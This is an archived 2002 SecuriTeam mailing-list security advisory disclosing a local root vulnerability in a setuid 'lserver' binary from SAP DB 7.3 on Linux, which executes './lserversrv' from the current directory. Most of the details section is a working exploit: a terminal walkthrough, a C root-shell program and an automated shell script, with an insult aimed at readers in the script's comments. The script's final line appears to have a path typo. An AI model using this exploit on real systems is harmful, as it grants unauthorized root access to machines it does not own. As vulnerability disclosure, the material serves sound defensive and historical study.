[UNIX] SAP Database Local Root via Symlink
From: support@securiteam.com
Date: 12/08/02
- Previous message: support@securiteam.com: "[UNIX] SquirrelMail XSS Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 8 Dec 2002 23:15:31 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
SAP Database Local Root via Symlink
------------------------------------------------------------------------
SUMMARY
During an evaluation of the SAP database for Linux KF located a security
issue in one of their suid binaries. This issue is a symlink attack
against a binary that makes an execve call to a file in your current
directory. The details of this issue are outlined below.
DETAILS
Technical details:
This local attack upon SAP is based on
sapdb-server-linux-32bit-i386-7_3_0_29.tgz it is currently unknown if this
affects other SAP flavors.
[elguapo@rh8 pgm]$ pwd
/usr/sapdb/depend/pgm
[elguapo@rh8 pgm]$ ls -al lserver
-rwsrwxr-x 1 root sapdb 15673 Oct 22 10:42 lserver
Using ltrace we can see an attempt to run ./lserversrv via execve()
[elguapo@rh8 pgm]$ ltrace ./lserver
__libc_start_main(0x08048800, 1, 0xbffff994, 0x08048690, 0x08048a0c
<unfinished ...>
__register_frame_info(0x0804a0b8, 0x0804a1bc, 0xbffff948, 0x080486b5,
0x4212a2d0) = 0
malloc(10) = 0x0804a200
strcpy(0x0804a200, "./lserver") = 0x0804a200
execv("./lserversrv", 0xbffff994 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
The problem with this execve call is that when looking for "./lserversrv"
the lserver does not check for any symlinks. The abuser can very easily
make his own lserversrv.
We are just going to make a directory in /tmp to use for scratch space
[elguapo@rh8 pgm]$ cd /tmp
[elguapo@rh8 tmp]$ mkdir "snosoft+sapdb=root"
[elguapo@rh8 tmp]$ cd "snosoft+sapdb=root"
Next we make a symlink to the suid binary lserver
[elguapo@rh8 snosoft+sapdb=root]$ ln -s /usr/sapdb/depend/pgm/lserver
lserver
As we saw above lserver trys to do the following:
execv("./lserversrv", 0xbffff994 <unfinished ...>
This is easy enough to take advantage of...
[elguapo@rh8 snosoft+sapdb=root]$ cp /usr/bin/id lserversrv
As you can see we have the euid of root at this point in time...
[elguapo@rh8 snosoft+sapdb=root]$ /tmp/snosoft+sapdb\=root/lserver
uid=500(elguapo) gid=500(elguapo) euid=0(root) groups=500(elguapo)
Finishing up the task is trivial from there...
[elguapo@rh8 snosoft+sapdb=root]$ cat > root.c
main(){
setuid(0);
setgid(0);
system("/bin/sh");
}
[elguapo@rh8 snosoft+sapdb=root]$ cc -o root root.c
[elguapo@rh8 snosoft+sapdb=root]$ cp root lserversrv
[elguapo@rh8 snosoft+sapdb=root]$ ./lserver
sh-2.05b# id
uid=0(root) gid=0(root) groups=500(elguapo)
Exploit:
# dotslash@snosoft.com
# sapdb-server-linux-32bit-i386-7_3_0_29.tgz exploit
# -rwsrwxr-x 1 root sapdb /usr/sapdb/depend/pgm/lserver
#
# This is an extremely lame script.
# If you can not do this by hand you are a retard.
#
# [elguapo@rh8 tmp]$ id
# uid=500(elguapo) gid=500(elguapo) groups=500(elguapo)
# [elguapo@rh8 tmp]$ ./lame.sh
# sh-2.05b# id
# uid=0(root) gid=0(root) groups=500(elguapo)
cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
/lserver
Vendor response:
The alert from SAP is located here:
<http://www.sapdb.org/sap_db_alert.htm>
http://www.sapdb.org/sap_db_alert.htm
ADDITIONAL INFORMATION
The information has been provided by <mailto:dotslash@snosoft.com> KF.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[NEWS] Proxy Vulnerability in TrendMicro InterScan VirusWall"
- Previous message: support@securiteam.com: "[UNIX] SquirrelMail XSS Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
